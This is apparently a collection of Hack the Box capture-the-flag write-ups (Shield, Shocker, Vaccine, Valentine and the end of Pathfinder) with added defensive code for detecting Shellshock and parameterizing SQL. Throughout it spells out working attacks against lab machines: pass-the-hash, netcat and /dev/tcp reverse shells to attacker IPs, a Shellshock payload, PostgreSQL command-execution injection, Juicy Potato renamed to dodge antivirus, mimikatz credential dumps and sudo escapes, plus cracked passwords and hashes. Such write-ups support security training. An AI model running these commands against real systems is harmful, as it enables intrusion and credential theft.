svc_bes:aes128-cts-hmac-sha1-96:7d671ab13aa8f3dbd9f4d8e652928ca0
svc_bes:des-cbc-md5:1cc16e37ef8940b5
sandra:aes256-cts-hmac-sha1-96:2ddacc98eedadf24c2839fa3bac97432072cfac0fc432cfba9980408c929d810
sandra:aes128-cts-hmac-sha1-96:c399018a1369958d0f5b242e5eb72e44
sandra:des-cbc-md5:23988f7a9d679d37
PATHFINDER$:aes256-cts-hmac-sha1-96:9746728aa86c802b483aa9304887a8b60e5f5d5895bfd1c182dbaa5f684226f3
PATHFINDER$:aes128-cts-hmac-sha1-96:a45fe07f2fc61fbebafce78f73a97644
PATHFINDER$:des-cbc-md5:e364941fc7ef5dd3
[*] Cleaning up...
```

Using the domain administrator's NTLM hash, we can perform a pass-the-hash (PTH) attack to gain elevated access to the system; no cracking is needed, because NTLM authentication only proves knowledge of the hash itself. For this, we can use Impacket's psexec.py. Its `-hashes` argument takes `LMHASH:NTHASH`; the LM part `aad3b435b51404eeaad3b435b51404ee` is the constant for an empty LM hash, as seen on every line of the dump.

```
psexec.py megacorp.local/administrator@10.10.10.30 -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
```

And we are root (`NT AUTHORITY\SYSTEM`, since psexec.py runs its payload as a service)!
Now we can obtain the root.txt which is located in C:\Users\Administrator\Desktop: `ee613b2d048303e5fd4ac6647d944645`

-------------------------------------------------------------------------------- /README.md: --------------------------------------------------------------------------------

# Hack the Box - Writeups

## Starting point

- [Oopsie](Oopsie) [Linux, Web, Cookies]
- [Vaccine](Vaccine) [Linux, Web, John, SQL Injection]
- [Shield](Shield) [Windows, Wordpress, Metasploit]
- [Pathfinder](Pathfinder) [Windows, Active Directory, Kerberos, Attack Graph]
- [Included](Included) [Linux, Web, LFI, Upload, lxc]
- [Markup](Markup) [Windows, XXE]
- [Guard](Guard) [Linux, Restricted Shell, Cracking]
- [Base](Base) [Linux, PHP authentication, Directory Discovery]

## Machines

- [Lame](Lame) [Linux, smb]
- [Legacy](Legacy) [Windows, well known vulnerability]
- [Beep](Beep) [Linux, LFI, FreePBX, elastix, vtigerCRM, SMTP]
- [Devel](Devel) [Windows, IIS, Priv-Esc]
- [Optimum](Optimum) [Windows, HttpFileServer, Priv-Esc]
- [Bank](Bank) [Linux, DNS, Routing]
- [Blocky](Blocky) [Linux, SQL, Wordpress]
- [Shocker](Shocker) [Linux, well known vulnerability, cgi]
- [Mirai](Mirai)
[Linux, well known vulnerability, data recovery]
- [Valentine](Valentine) [Linux, well known vulnerability]
- [Laboratory](Laboratory) [Linux, Gitlab RCE/LFI]
- [Academy](Academy) [Linux, Laravel]
- [Doctor](Doctor) [Linux, SSTI, splunk]

## Challenges

- [RE: Find The Easy Pass](FindTheEasyPass) [exe]

-------------------------------------------------------------------------------- /Shield/README.md: --------------------------------------------------------------------------------

# Starting Point - Shield

## Enumeration

```
PORT     STATE SERVICE REASON  VERSION
80/tcp   open  http    syn-ack Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3306/tcp open  mysql   syn-ack MySQL (unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

### Examining Port 80 - Windows Server Internet Information Services (IIS)

![](pics/webserver.png)

Navigating to port 80, we can see the default IIS start page (typical for websites hosted on Windows Server). So we probably have to find the real application/directories ourselves.

Therefore, we are going to use a tool like `gobuster`:
```
gobuster dir -u "http://10.10.10.29" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```

It relatively quickly finds a directory called `/wordpress`. Let's head over to it.

![](pics/wordpress.png)

The WordPress website is apparently a company's website that deals with electric trucks. It has two big buttons, neither of which has any functionality. Furthermore, it has an additional tab called `BLOG`, which leads us to their blog (also implemented with WordPress).

![](pics/blog.png)

On the blog website, we also have the possibility to log in, which leads us to the following page:

![](pics/wp_login.png)

I tried bruteforcing the login with username `admin`, as Wordpress has the bad behaviour of leaking usernames. It basically gives you a different error message if you guessed the username correctly.

![](pics/error1.png)

![](pics/error2.png)

Unfortunately, I had no success in doing so. After a few hours of research, I took a look at the official writeup of the room... In the writeup they state: `Since we have already acquired the password P@s5w0rd!, we can try to login to the WordPress site.`... Wait. Where and how did we acquire that exactly? That's what I asked in the official Discord server. Their answer was pretty much like "That's the password of the DB user in the previous machine! It's obvious that you should test that password for the Wordpress admin in this machine" .... riiiiiiight.

Anyway...

## Exploitation
Now that we are logged in with the **obvious** credentials `admin:P@s5w0rd!`, and have full access to the Wordpress admin dashboard, we can set up a reverse shell to the server. We are going to use `metasploit` for that, as Windows systems are always a bit tricky.

So we open `msfconsole` and search for a suitable module.

![](pics/metasploit_search.png)

We type `use 0` to select this module. Afterwards we type `show options` to see all the options we can and must set.

![](pics/metasploit_options.png)

After configuring it for our machine like that:

![](pics/metasploit_filled_options.png)

we can start the exploit.

![](pics/metasploit_run.png)

By typing `sysinfo` we get some information about the system:

```
meterpreter > sysinfo
Computer    : SHIELD
OS          : Windows NT SHIELD 10.0 build 14393 (Windows Server 2016) i586
Meterpreter : php/windows
```

We see that this is a rather old Windows Server version. Let's see if it has any known vulnerabilities regarding privilege escalation.

And indeed! It's called `Rotten Potato` ([Github](https://github.com/foxglovesec/RottenPotato), [Youtube](https://www.youtube.com/watch?v=8Wjs__mWOKI)). For our case, we will use a slight modification of that exploit called `Juicy Potato` ([Github](https://github.com/ohpe/juicy-potato/)).

### Upload Netcat

Download `nc.exe` from [here](https://github.com/int0x33/nc.exe/blob/master/nc.exe). Afterwards, change the directory in your meterpreter session to
```
C:/inetpub/wwwroot/wordpress/wp-content/uploads
```
Then upload the `nc.exe` file. To execute it, use the following command:

```
msf > execute -f nc.exe -a "-e cmd.exe 10.10.14.125 1234"
```

This only works, of course, if you have a nc listener running.

### Prepare the Juicy Potato Exploit

We can create a batch file that will be executed by the exploit and return a SYSTEM shell. Let's add the following contents to `shell.bat` (run it from the nc reverse shell).

```
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.125 1111 > shell.bat
```

Now start another nc listener on your local machine with the port specified in `shell.bat`.

Afterwards, we upload the Juicy Potato exe with an uncommon name (I chose jp.exe), so that Windows Defender won't detect it.

The final step is to execute the Juicy Potato exe with the previously generated `shell.bat` file like so:

```
jp.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
```

![](pics/system_shell.png)

The root.txt is located in C:\Users\Administrator\Desktop: `6e9a9fdc6f64e410a68b847bb4b404fa`

## Post Exploitation

[Mimikatz](https://github.com/sebastiendamaye/hackthebox/raw/master/01-starting_point/04-Shield/files/mimikatz.exe) can be used to find additional cached passwords on the machine. This might be useful for the next challenge.

So we upload the exe from the meterpreter session and execute it:

```
meterpreter > upload mimikatz.exe
```

Then do the following in the SYSTEM shell:

```
$ .\mimikatz.exe

$ mimikatz> sekurlsa::logonpasswords

...

Authentication Id : 0 ; 216075 (00000000:00034c0b)
Session           : Interactive from 1
User Name         : sandra
Domain            : MEGACORP
Logon Server      : PATHFINDER
Logon Time        : 1/4/2021 11:12:16 AM
SID               : S-1-5-21-1035856440-4137329016-3276773158-1105
        msv :
         [00000003] Primary
         * Username : sandra
         * Domain   : MEGACORP
         * NTLM     : 29ab86c5c4d2aab957763e5c1720486d
         * SHA1     : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38
         * DPAPI    : f4c73b3f07c4f309ebf086644254bcbc
        tspkg :
        wdigest :
         * Username : sandra
         * Domain   : MEGACORP
         * Password : (null)
        kerberos :
         * Username : sandra          <-- USERNAME
         * Domain   : MEGACORP.LOCAL
         * Password : Password1234!   <-- PASSWORD
        ssp :
        credman :

...
```

The found credentials are `sandra:Password1234!`.
--------------------------------------------------------------------------------
/Shocker/README.md:
--------------------------------------------------------------------------------
![](pics/logo.png)

# Shocker (Linux)

## Enumeration

```
rustscan --ulimit 5000 10.129.1.175 -- -sC -sV -o port_scan

PORT     STATE SERVICE REASON  VERSION
80/tcp   open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### Examine Port 80 - Apache Server

![](pics/website.png)

Accessing Port 80 via the browser, we only see a picture. Guess we have to enumerate the webserver and search for other directories using `gobuster`:

```
└──╼ $ gobuster dir -u "10.129.1.175" -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.129.1.175
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/01/19 08:47:59 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/cgi-bin/ (Status: 403)
/server-status (Status: 403)
```

Gobuster reveals two additional directories: `cgi-bin` and `server-status`. While server-status is not that interesting, cgi-bin can lead to serious vulnerabilities such as Shellshock.

### Shellshock
Shellshock is effectively a Remote Command Execution vulnerability in Bash that is caused by the fact that Bash (versions 1.0.3 - 4.3) incorrectly executes trailing commands when it imports a function definition stored in an environment variable:

```
env x='() { :;}; echo vulnerable' bash -c "echo test"
```

Vulnerable versions of Bash interpret `x='() { :;};'` as a function definition for a function named x. The function body is simply `:` (colon), which is a Bash builtin that does nothing and returns with exit code 0. While importing the function, Bash also executes the code following it - `echo vulnerable`. The overall output is

```
vulnerable
test
```

### Exploiting Shellshock

As the machine is also called Shocker, I assume that this is the vulnerability that we should exploit. So let's see if we can find some vulnerable scripts in the directory.

Those scripts are mostly written in bash, perl or python, or have the cgi extension. We can use gobuster again to scan the directory!

```
gobuster dir -u "10.129.1.175/cgi-bin/" -w /usr/share/wordlists/dirb/common.txt -x sh,pl,cgi,py
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.129.1.175/cgi-bin/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     cgi,sh,pl,py
[+] Timeout:        10s
===============================================================
2021/01/19 09:13:54 Starting gobuster
===============================================================
/user.sh (Status: 200)

```

If we access the file via the browser, it asks us to download the response of the script:

```
└──╼ $ cat user.sh
Content-Type: text/plain

Just an uptime test script

 03:16:23 up 32 min,  0 users,  load average: 0.19, 0.15, 0.09
```

The script apparently executes the command `uptime`.

*When a webserver uses the Common Gateway Interface (CGI) to handle a document request, it passes various details of the request to a handler program in the environment variable list. For example, the variable HTTP_USER_AGENT has a value that, in normal usage, identifies the program sending the request. If the request handler is a Bash script, or if it executes one for example using the system(3) call, Bash will receive the environment variables passed by the server and will process them as described above. This provides a means for an attacker to trigger the Shellshock vulnerability with a specially crafted server request. Security documentation for the widely used Apache web server states "CGI scripts can ... be extremely dangerous if they are not carefully checked." and other methods of handling web server requests are often used* (https://github.com/opsxcq/exploit-CVE-2014-6271)

## Gaining an Initial Foothold

To establish a reverse shell, we first set up our netcat listener and then execute the following:

```
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.26/4444 0>&1" http://10.129.1.175/cgi-bin/user.sh
```

This will exploit the Shellshock vulnerability and create a reverse shell for us. Of course this can also be done with Burp or some scripts or even modules from Metasploit. But I usually prefer to do it manually.

![](pics/reverse_shell.png)

## Privilege Escalation

Checking the available commands that can be executed with sudo, we see that our current user shelly can execute perl with sudo privileges.
```
shelly@Shocker:/home/shelly$ sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
```

Now it's rather easy:

```
shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";'
# id
uid=0(root) gid=0(root) groups=0(root)
```

We are root!
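The Shellshock mechanism explained above (a header value that vulnerable Bash imports as a function definition, delivered through the CGI environment), seen from the defender's side. This is an added example, not code from the writeup: the Apache log lines are constructed, with the lab IPs and the `/cgi-bin/user.sh` path taken from the writeup.

```python
"""Detecting Shellshock-style (CVE-2014-6271) payloads in CGI request headers.

Added example, not code from the original writeup. The log lines below are
constructed; the header-to-environment mapping follows the CGI convention
the quote above relies on (User-Agent -> HTTP_USER_AGENT).
"""
import re

# Bash 1.0.3 - 4.3 treats an environment variable whose value starts with
# "() {" as an exported function definition and, because of the bug, keeps
# parsing and executes whatever follows the closing brace.
FUNC_DEF = re.compile(r"^\s*\(\)\s*\{")

# Apache "combined" log format: ... "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)


def cgi_env_name(header: str) -> str:
    """Map an HTTP header name to the CGI environment variable a script sees."""
    return "HTTP_" + header.strip().upper().replace("-", "_")


def is_shellshock_value(value: str) -> bool:
    """True if a header value would be imported by vulnerable Bash as a function."""
    return bool(FUNC_DEF.match(value))


def trailing_command(value: str) -> str:
    """Return the text after the function body, i.e. what vulnerable Bash runs."""
    depth = 0
    for i, ch in enumerate(value):
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth == 0:
                rest = value[i + 1:].lstrip()
                return rest[1:].strip() if rest.startswith(";") else rest
    return ""


def scan_headers(headers: dict) -> list:
    """Flag request headers whose value carries a Shellshock payload.

    Returns (cgi_env_var, trailing_command) tuples, one per suspicious header.
    """
    hits = []
    for name, value in headers.items():
        if is_shellshock_value(value):
            hits.append((cgi_env_name(name), trailing_command(value)))
    return hits


def scan_access_log(lines) -> list:
    """Scan Apache combined-format lines for a Shellshock payload in the
    User-Agent; returns (client_ip, request_path, trailing_command) per hit."""
    hits = []
    for line in lines:
        m = COMBINED.match(line)
        if m and is_shellshock_value(m.group("ua")):
            path = m.group("req").split()[1]
            hits.append((m.group("ip"), path, trailing_command(m.group("ua"))))
    return hits


# Constructed sample log lines (IPs and paths follow the writeup's lab setup).
SAMPLE_LOG = [
    '10.10.14.26 - - [19/Jan/2021:09:20:11 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 112 "-" "curl/7.74.0"',
    '10.10.14.26 - - [19/Jan/2021:09:21:03 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "-" "() { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.26/4444 0>&1"',
    '10.10.14.26 - - [19/Jan/2021:09:21:40 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "() { :; }; id"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("Shellshock attempt from %s against %s, payload: %s" % hit)
```

The third sample line is flagged even though it does not target `/cgi-bin/`, because which paths a server hands to a Bash-backed handler is a server configuration detail the log alone does not reveal.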
--------------------------------------------------------------------------------
/Vaccine/README.md:
--------------------------------------------------------------------------------
# Starting Point - Vaccine

## Enumeration

```
rustscan 10.10.10.46 -- -sC -sV -o port_scan

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
22/tcp open  ssh     syn-ack OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```


### Examine Port 80 - Apache Server

![](pics/apache_server.png)

Seems to be a login website. Using the credentials `admin:MEGACORP_4dm1n!!` of the previous challenge fails. So this is a dead end for now.

Let's try to scan the server for other directories. For this, we can use a tool like `dirb`, `dirbuster` or `gobuster`:

```
gobuster dir -u "http://10.10.10.46" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```

While this is running, we can check out the open FTP port.


### Examine Port 21 - FTP

In the previous challenge, we found some FTP credentials in the Filezilla configs that belonged to root.

```
ftpuser
mc@F1l3ZilL4
```

![](pics/ftp_login.png)

And indeed! We can log in.

In there, we find a file called `backup.zip`.
```
-rw-r--r--    1 0        0            2533 Feb 03  2020 backup.zip
```
Using the `GET` command we can download it to our local machine. Unfortunately, the zip file is password protected.

However, we can try to bruteforce the password with `john`.
Therefore, we first have to use the tool `zip2john`. It converts the zip file into a format john understands.

```
backup.zip:$pkzip2$2*2*1*0*8*24*3a41*5722*543fb.....
```

Afterwards, we can use `john` to crack the hash.

```
$ john backup_hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963        (backup.zip)
1g 0:00:00:00 DONE (2021-01-02 12:26) 50.00g/s 44800p/s 44800c/s 44800C/s michelle1..ilovegod
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

Success! The password for the zip is `741852963`.

Unzipping the file, we receive two files:

1) index.php
2) style.css

Opening the `index.php` file we see the following:
```html

MegaCorp Login

```
That seems familiar, right? That's the login page on Port 80.
Let's further investigate the file.

```php

```
The php code reveals the valid username (`admin`) and the md5 hash of the password (`2cb42f8734ea607eefed3b70af13bbd3`). So all that's left is to crack the md5 hash.

For such a task I usually use [crackstation](https://crackstation.net/).

![](pics/crackstation.png)

There we have it! The password is `qwerty789`

## Further Examine Port 80 - Login Page

Using the credentials `admin:qwerty789` we can successfully log in and get access to the MegaCorp Car Catalogue (/dashboard.php).

![](pics/megacorp_car_catalogue.png)

The dashboard contains information about several cars. I'm assuming they are loaded from a database. Furthermore, the website only has a SEARCH functionality. Source code, cookies etc. did not reveal any interesting information. So what can you do with that SEARCH field?

Searching for "ELIXIR" (one of the car names) changes the dashboard content, so that only Elixir is shown. If we search for "SPORTS" (one of the car types), the page stays empty.

So my guess is that, once we hit that SEARCH button, an SQL query is sent to the database to retrieve all results with the attribute `carname/car/name` set to our value. From an attacker's perspective, this can be vulnerable to SQL Injection if not implemented carefully. So let's try that.

![](pics/test_sqli.png)

By inserting a single `'` character into the search field and pressing enter, we get the following error message: `ERROR: unterminated quoted string at or near "'" LINE 1: Select * from cars where name ilike '%'%' ^`. So here we have the proof that the search field is indeed vulnerable to SQL injection.
Let's gain information about the database by following these steps:

1) Find out how many columns are in the `cars` table.

By injecting `' ORDER BY 1--` and increasing the number until we receive an error, we learn how many columns exist. In our case, we get the error with `' ORDER BY 6--`. Therefore, we know the `cars` table has 5 columns.

2) Gain information about the column types

Now that we know how many columns there are, we can extract further information with the [SQL Injection UNION attack](https://portswigger.net/web-security/sql-injection/union-attacks).

- `' UNION SELECT 'a', NULL, NULL, NULL, NULL --` : ERROR
- `' UNION SELECT NULL, 'a', NULL, NULL, NULL --` : VALID
- `' UNION SELECT NULL, NULL, 'a', NULL, NULL --` : VALID
- `' UNION SELECT NULL, NULL, NULL, 'a', NULL --` : VALID
- `' UNION SELECT NULL, NULL, NULL, NULL, 'a' --` : VALID

From this, we know that we can extract valuable information in the form of strings when modifying the columns at index 1-4 (counting from 0) of the UNION query.

3) Extract valuable information (table names etc.)

Using the [Portswigger SQLI Cheatsheet](https://portswigger.net/web-security/sql-injection/cheat-sheet), we can retrieve a lot of information about the database system:

- Version: `' UNION SELECT NULL, NULL, NULL, NULL, VERSION() --`: PostgreSQL 11.5 (Ubuntu 11.5-1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 9.1.0-9ubuntu2) 9.1.0, 64-bit
- Table names: `' UNION SELECT NULL, table_schema, table_name, NULL, NULL FROM information_schema.tables --`

4) Executing Arbitrary Commands via SQL Injection in PostgreSQL

According to [this article](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5), all versions of PostgreSQL from 9.3 on are vulnerable to this kind of arbitrary command execution (CVE-2019-9193)
```
'; CREATE TABLE cmd_exec(cmd_output text); --

'; COPY cmd_exec FROM PROGRAM 'bash -c ''bash -i >& /dev/tcp/10.10.14.55/4444 0>&1'''; --

(if output is needed)
'; SELECT * FROM cmd_exec; -- (make sure the column number is correct)
```

5) PROFIT

![](pics/reverse_shell.png)

We now have access to the server!

Btw, this all could have also been done automatically by using `sqlmap`, but for the sake of learning: keep doing it manually!

```
$ sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=vmnafl0uct1r97s1k5bkpoiopg" --dump-all --tamper=space2comment

and

$ sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=vmnafl0uct1r97s1k5bkpoiopg" --os-shell
```

## Exploitation

In the home directory of our current user (/var/lib/postgresql), we can find a file called `user.txt`. It contains the user flag for the machine: `139d3e5c3db18073d250ce0dccc43997`.
Furthermore, the directory also contains the `.ssh` directory, in which the private and public SSH key of the user are located. We can use them to stabilize our current connection.

```
$ chmod 600 ssh_key (private one)

$ ssh -i postgres_sshkey postgres@10.10.10.46
```

In the `/var/www/html` directory, we can also find the source code for `dashboard.php`. Let's take a look at the vulnerable SQL query.

```php
$q = "Select * from cars where name ilike '%". $_REQUEST["search"] ."%'";
```

So it's basically just appending our user input to the SQL query, which is, as seen, a very bad idea. There should be security measures in place, such as user-input validation.

Furthermore, we can also see the credentials of our current user `postgres`:

```php
$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
```

Having that, we can now check the sudoers list to see if our current user can execute a binary with sudo privileges:

```
postgres@vaccine:/var/www/html$ sudo -l
[sudo] password for postgres:
Matching Defaults entries for postgres on vaccine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
```

Indeed! We can execute `/bin/vi` on a specific file with sudo privileges. However, we can also start a shell from within `vi` and escape this restriction.

We execute:
```
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
```
Once we are in the file editor, we press ESC and type:

```
:!/bin/sh

or

:shell
```

Now we have full root access:

```
root@vaccine:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
```

The root.txt is: `dd6e058e814260bc70e9bbdef2715849`
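To make the `dashboard.php` query concrete, here is the concatenated search from the writeup rebuilt in Python beside a parameterized version, run against the same probes the writeup used. This is an added example, not code from the machine: the `cars` table, its five column names and its rows are constructed, SQLite's `LIKE` (case-insensitive for ASCII) stands in for PostgreSQL's `ILIKE`, and `sqlite_master` stands in for `information_schema.tables`.

```python
"""The dashboard.php search rebuilt against an in-memory SQLite database:
the string-concatenated query from the writeup beside a parameterized one.

Added example, not code from the machine. The cars table and its rows are
constructed (five columns, as the ORDER BY probe in the writeup showed).
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for carsdb; column names are an assumption."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cars (id INTEGER, name TEXT, type TEXT, fuel TEXT, engine TEXT)")
    conn.executemany("INSERT INTO cars VALUES (?, ?, ?, ?, ?)", [
        (1, "Elixir", "Sports", "Petrol", "2000cc"),
        (2, "Sandy", "Sedan", "Petrol", "1000cc"),
        (3, "Meta", "SUV", "Diesel", "2500cc"),
    ])
    return conn


def vulnerable_search(conn, search: str) -> list:
    # Mirrors the PHP: $q = "Select * from cars where name ilike '%". $_REQUEST["search"] ."%'";
    # The user's text becomes part of the SQL grammar, so quotes, UNION and
    # comment markers are interpreted, not matched.
    q = "SELECT * FROM cars WHERE name LIKE '%" + search + "%'"
    return conn.execute(q).fetchall()


def safe_search(conn, search: str) -> list:
    # Same query with the term bound as a parameter: whatever it contains,
    # the database only ever sees it as the string to match against.
    q = "SELECT * FROM cars WHERE name LIKE ?"
    return conn.execute(q, ("%" + search + "%",)).fetchall()


def probe(conn, fn, search: str):
    """Run a search and report either the rows or the database error text,
    the two signals the writeup used to confirm and then exploit the injection."""
    try:
        return fn(conn, search)
    except sqlite3.Error as exc:
        return "ERROR: " + str(exc)


# The probes from the writeup, plus the schema-dump UNION adapted to SQLite.
PROBES = [
    "ELIXIR",
    "'",
    "' ORDER BY 5--",
    "' ORDER BY 6--",
    "' UNION SELECT NULL, NULL, NULL, NULL, 'a' --",
    "' UNION SELECT NULL, name, sql, NULL, NULL FROM sqlite_master --",
]

if __name__ == "__main__":
    conn = make_db()
    for p in PROBES:
        print(repr(p))
        print("  concatenated :", probe(conn, vulnerable_search, p))
        print("  parameterized:", probe(conn, safe_search, p))
```

Step 4 above worked only because the application connects as the `postgres` superuser: `COPY ... FROM PROGRAM` is restricted to superusers and, from PostgreSQL 11, members of `pg_execute_server_program`, so a dedicated low-privilege database role for the web application would have capped the injection at data disclosure.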
--------------------------------------------------------------------------------
/Valentine/README.md:
--------------------------------------------------------------------------------
![](pics/logo.png)

# Valentine (Linux)

## Enumeration

```
rustscan --ulimit 5000 10.129.1.190 -- -sC -sV -o port_scan


PORT    STATE SERVICE  REASON  VERSION
22/tcp  open  ssh      syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     syn-ack Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http syn-ack Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Issuer: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
```

### Examine Port 80 - Apache webserver

![](pics/apache80.png)

```
└──╼ $ gobuster dir -u 10.129.1.190 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.129.1.190
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/01/26 12:55:32 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/cgi-bin/ (Status: 403)
/decode (Status: 200)
/dev (Status: 301)
/encode (Status: 200)
/index (Status: 200)
/index.php (Status: 200)
/server-status (Status: 403)
```

Let's check out the found results one by one.

#### Check: /cgi-bin/

The typical vulnerability that comes with an exposed /cgi-bin/ directory is Shellshock. It enables RCE and must therefore be carefully investigated.

However, it seems like no scripts are in there. At least I did not find any with any wordlist.

### Check: /decode & /encode

![](pics/decoder.png)

Here, we see some kind of service that offers "Secure Data Decryption". We also have an Encoder service at /encode
We also have an Encoder service at /encode 71 | 72 | ![](pics/encoder.png) 73 | 74 | ### Check: /dev 75 | 76 | The dev directory leaks two very interesting files. 77 | - hype_key: contains an apparently hex encoded string. When converting it to ascii, we can see it's a encrypted RSA private key. Probably for ssh. 78 | - notes.txt: 79 | ``` 80 | To do: 81 | 82 | 1) Coffee. 83 | 2) Research. 84 | 3) Fix decoder/encoder before going live. 85 | 4) Make sure encoding/decoding is only done client-side. 86 | 5) Don't use the decoder/encoder until any of this is done. 87 | 6) Find a better way to take notes. 88 | ``` 89 | So apparently the decoder and encoder services do have some issues. Let's investiate them further. If we get stuck, we can still try the way of bruteforcing the RSA key password. 90 | 91 | 92 | ## Investigating the Decoder and Encoder Service 93 | 94 | Testing the encoder, reveals that it's a simple base64 encoder. 95 | 96 | ``` 97 | Your input: 98 | test 99 | Your encoded input: 100 | dGVzdA== 101 | ``` 102 | 103 | Same counts for the decoder. It's able to decode base64: 104 | 105 | ``` 106 | Your input: 107 | dGVzdA== 108 | Your encoded input: 109 | test 110 | ``` 111 | 112 | So what could be the issue with this application? In the note it is stated `"Make sure encoding/decoding is only done client-side"`. Maybe we have some kind of "eval" on the backened that executes the `base64` command. If so, then we could insert a payload and force it to execute it. Let's try that. 113 | 114 | Unfortunately, that's not the case. Hmm... what else could the issue be? Why would the note say it should only be done client-side? While looking through the different directories without having any idea what I missed, I recognized the picture that we saw on the index.html page. It's a big red heart, which is the logo of a very well known software bug, the Heartbleed bug. 
